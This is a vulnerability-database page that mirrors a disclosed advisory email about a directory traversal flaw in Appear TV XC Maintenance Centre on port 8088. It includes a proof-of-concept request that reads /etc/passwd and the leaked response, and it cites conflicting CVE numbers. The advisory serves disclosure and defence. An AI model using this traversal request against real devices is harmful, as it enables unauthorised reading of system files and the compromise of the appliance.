Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Appear TV XC Hardware Maintenance Centre Directory Traversal

🗓️ 13 Apr 2018 00:00:00Reported by IS Threat TeamType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 68 Views

CVE-2017-12544 Directory Traversal on Appear TV XC Hardware Maintenance Centre, Impacting All Version

Related
Code
ReporterTitlePublishedViews
Family
CNVD		HPE System Management Homepage Cross-Site Scripting Vulnerability (CNVD-2017-33360)
27 Sep 201700:00
cnvd
CNVD		AppearTV XC5000 and XC5100 File Read Vulnerability
19 Apr 201800:00
cnvd
Check Point Advisories		HPE System Management Homepage Cross-site Scripting (CVE-2017-12544) - Ver2
15 Apr 201800:00
checkpoint_advisories
Check Point Advisories		HPE System Management Homepage Issue (CVE-2017-12544) - Ver2
22 Nov 201800:00
checkpoint_advisories
Check Point Advisories		Appear TV XC5000 and XC5100 Arbitrary File Read (CVE-2018-7539)
3 Jul 202000:00
checkpoint_advisories
CVE		CVE-2017-12544
15 Feb 201822:00
cve
CVE		CVE-2018-7539
17 Apr 201820:00
cve
Cvelist		CVE-2017-12544
15 Feb 201822:00
cvelist
Cvelist		CVE-2018-7539
17 Apr 201820:00
cvelist
Tenable Nessus		HP System Management Homepage < 7.6.1 Multiple Vulnerabilities (HPSBMU03753)
28 Sep 201700:00
nessus
Rows per page
`CVE-2018-7539 Directory Traversal on Appear TV Maintenance centre 8088  
  
Discoverer: Arqiva Threat Team  
  
Person Karl W  
  
  
Product: Appear TV XC Hardware Maintenance Centre on port TCP/8088  
  
  
  
Vendor : Appear TV  
  
  
  
Code Versions: All Version  
  
  
  
Vulnerability: Directory Traversal  
  
  
  
Impact: It is possible to read OS files with specially crafted URL  
  
  
  
Attack Type: Remote  
  
  
  
CVE: CVE-2017-12544  
  
  
  
------------------------------------------  
Description  
  
The web server (fuzzd/0.1.1) running the Maintenance Center on port TCP/8088 allows an attacker to use a specially crafted URL to read Operating System (OS) files.  
This vulnerability was used in the full compromise of the appliance.  
  
------------------------------------------  
  
  
  
Proof code:  
  
  
Request:  
  
  
GET /../../../../../../../../../../../../etc/passwd  
Host: x.x.x.x:8088  
User-Agent: curl/7.56.1  
  
Accept: */*  
  
  
Response:  
  
  
HTTP/1.1 200 OK  
Content-Length: 1110  
Content-Type: text/plain; charset=utf-8  
Cache-Control: max-age=3600  
Server: fuzzd/0.1.1  
  
root:x:0:0:root:/root:/bin/ash  
bin:x:1:1:bin:/bin:/sbin/nologin  
daemon:x:2:2:daemon:/sbin:/sbin/nologin  
adm:x:3:4:adm:/var/adm:/sbin/nologin  
  
  
  
------------------------------------------  
  
  
  
[Reference]  
  
https://www.appeartv.com/xc5000xc5100/  
  
  
  
------------------------------------------  
  
  
  
vendor confirmed and acknowledged the vulnerability  
  
  
  
Advised work around by disabling Maintenance Centre when not in use.  
  
Advised not able to fix.  
  
  
  
------------------------------------------  
  
  
Regards  
  
Karl W  
  
  
_________________________________________________________________________________________________  
  
This email, its content and any files transmitted with it are for the personal attention of the addressee only, any other usage or access is unauthorised. It may contain information which could be confidential or privileged. If you are not the intended addressee you may not copy, disclose, circulate or use it.  
  
If you have received this email in error, please destroy it and notify the sender by email. Any representations or commitments expressed in this email are subject to contract.   
  
Although we use reasonable endeavours to virus scan all sent emails, it is the responsibility of the recipient to ensure that they are virus free and we advise you to carry out your own virus check before opening any attachments. We cannot accept liability for any damage sustained as a result of software viruses. We reserve the right to monitor email communications through our networks.  
  
Arqiva Limited. Registered office: Crawley Court, Winchester, Hampshire SO21 2QA United Kingdom Registered in England and Wales number 2487597  
  
_________________________________________________________________________________________________  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Apr 2018 00:00Current
6.2Medium risk
Vulners AI Score6.2
EPSS0.59937
appear tv xc hardware maintenancedirectory traversalremote attackcve-2017-12544vulnerabilityoperating system filesport tcp/8088web servervendor acknowledgedsecurity advisory
68